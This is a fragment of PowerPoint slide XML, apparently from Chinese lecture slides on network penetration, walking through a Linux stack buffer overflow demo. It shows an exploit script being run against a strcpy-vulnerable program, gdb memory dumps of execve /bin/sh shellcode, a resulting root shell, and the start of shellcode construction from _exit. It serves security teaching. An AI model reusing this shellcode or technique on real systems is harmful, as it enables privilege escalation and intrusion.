          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>－－－－－－－－－－－</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>网络渗透技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>书上的示例程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# gcc vulnerable.c -o vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# vi exploit.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# perl exploit.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[+] Using ret shellcode 0xbfffffb8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw root]# ps ax | grep vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 5567 pts/2    S      0:00 /home/bof_codes/linux/stack/vulnerable ???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw root]# gdb vulnerable 5567</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Attaching to process 5567</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /home/bof_codes/linux/stack/vulnerable...done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /lib/tls/libc.so.6...done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Loaded symbols for /lib/tls/libc.so.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /lib/ld-linux.so.2...done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Loaded symbols for /lib/ld-linux.so.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xffffe002 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048394 &lt;main+0&gt;:    push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048395 &lt;main+1&gt;:    mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048397 &lt;main+3&gt;:    sub    $0x18,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804839a &lt;main+6&gt;:    and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804839d &lt;main+9&gt;:    mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a2 &lt;main+14&gt;:   sub    %eax,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a4 &lt;main+16&gt;:   sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483a7 &lt;main+19&gt;:   mov    0xc(%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483aa &lt;main+22&gt;:   add    $0x4,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483ad &lt;main+25&gt;:   pushl  (%eax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483af &lt;main+27&gt;:   lea    0xffffffe8(%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b2 &lt;main+30&gt;:   push   %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b3 &lt;main+31&gt;:   call   0x80482d4 &lt;strcpy&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483b8 &lt;main+36&gt;:   add    $0x10,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483bb &lt;main+39&gt;:   sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483be &lt;main+42&gt;:   lea    0xffffffe8(%ebp),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c1 &lt;main+45&gt;:   push   %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c2 &lt;main+46&gt;:   push   $0x8048484</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483c7 &lt;main+51&gt;:   call   0x80482c4 &lt;printf&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483cc &lt;main+56&gt;:   add    $0x10,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483cf &lt;main+59&gt;:   call   0x80482a4 &lt;getchar&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d4 &lt;main+64&gt;:   leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d5 &lt;main+65&gt;:   ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d6 &lt;main+66&gt;:   nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080483d7 &lt;main+67&gt;:   nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x080483d4 in main ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/20x  0xbfffffb8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffb8:     0x6852d231      0x68732f6e      0x622f2f68      0x52e38969</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffc8:     0x8de18953      0x80cd0b42      0x6f682f00      0x622f656d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffd8:     0x635f666f      0x7365646f      0x6e696c2f      0x732f7875</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffe8:     0x6b636174      0x776f6c66      0x6c75762f      0x6172656e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffff8:     0x00656c62      0x00000000      Cannot access memory at address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s  0xbfffffb8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffb8:      "1ÒRhn/shh//bi\211ãRS\211á\215B\vÍ\200"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffd1:      "/home/bof_codes/linux/stack/vulnerable"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffc:      ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffd:      ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbffffffe:      ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffffff:      ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xc0000000:      &lt;Address 0xc0000000 out of bounds&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program received signal SIGTRAP, Trace/breakpoint trap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x40000be0 in _start () from /lib/ld-linux.so.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# perl exploit.pl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[+] Using ret shellcode 0xbfffffb8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41157624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DD9038-BE50-4849-9002-D59BF1CD5F2A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>240</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pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -static -o exit exit.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gdb exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass _exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function _exit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9bc &lt;_exit+0&gt;:   mov    0x4(%esp,1),%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c0 &lt;_exit+4&gt;:   mov    $0xfc,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c5 &lt;_exit+9&gt;:   int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9c7 &lt;_exit+11&gt;:  mov    $0x1,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9cc &lt;_exit+16&gt;:  int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9ce &lt;_exit+18&gt;:  hlt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9cf &lt;_exit+19&gt;:  nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
          </a:p>
          <a:p>
